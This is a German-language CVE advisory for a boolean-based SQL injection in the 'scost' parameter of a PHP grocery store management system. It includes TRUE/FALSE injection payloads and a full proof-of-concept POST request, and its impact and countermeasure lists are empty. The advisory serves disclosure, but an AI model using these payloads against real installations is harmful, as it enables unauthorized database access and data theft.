
CVE-2026-37149 - SQL Injection vulnerability in the scost parameter of search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.
CVE-2026-37149 SQL-Injection in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0
Übersicht
CVE-ID: CVE-2026-37149 Schwachstellentyp: SQL-Injection (CWE-89) Schweregrad: Hoch Entdecker: Dhyey Patel
Beschreibung
GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 enthält eine SQL-Injection-Schwachstelle im Parameter "scost" der Datei "/grocery/search_products.php".
Die Anwendung validiert benutzereingegebene Daten nicht ordnungsgemäß, bevor sie in SQL-Abfragen eingebettet werden. Ein Angreifer kann über den anfälligen Parameter manipulierte SQL-Ausdrücke injizieren und die Datenbankabfragen im Backend manipulieren.
Eine erfolgreiche Ausnutzung kann unbefugten Zugriff auf sensible Datenbankinformationen und die Ausführung beliebiger SQL-Anweisungen ermöglichen.
Betroffenes Produkt
Produkt: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN
Version: v1.0
Repository des Anbieters:
https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-
Betroffene Komponente
Angriffsart Remote
Informationen zum Anbieter Open-Source-Projekt, gepflegt vom Repository-Besitzer: https://github.com/anirudhkannanvp
Technische Details
Die Schwachstelle wurde mittels Boolean-basierter SQL-Injection-Techniken bestätigt.
Payload für TRUE-Bedingung
-1 OR 321=6 AND 000483=000483 --
Payload für FALSE-Bedingung
-1 OR 320=6 AND 000483=000483 --
Die Antworten der Anwendung unterschieden sich je nachdem, ob die injizierte Bedingung TRUE oder FALSE ergab, was die SQL-Injection bestätigt.
Weitere Tests bestätigten die erfolgreiche Ausführung von SQL-Funktionen, einschließlich:
SELECT database()
Der zurückgegebene Datenbankname war:
grocery
Dies zeigt, dass über den anfälligen Parameter beliebige SQL-Abfragen ausgeführt werden können.
Beweis des Konzepts
Anfrage
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
Ergebnis
Die Antwort ändert sich abhängig von der injizierten Booleschen Bedingung, was die SQL-Injection im Parameter "scost" bestätigt.
Auswirkungen
Mögliche Auswirkungen umfassen:
Gegenmaßnahmen
Entwickler sollten:
Referenzen OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection
MITRE CVE Program https://www.cve.org
Credits Entdeckt und gemeldet von: Dhyey Patel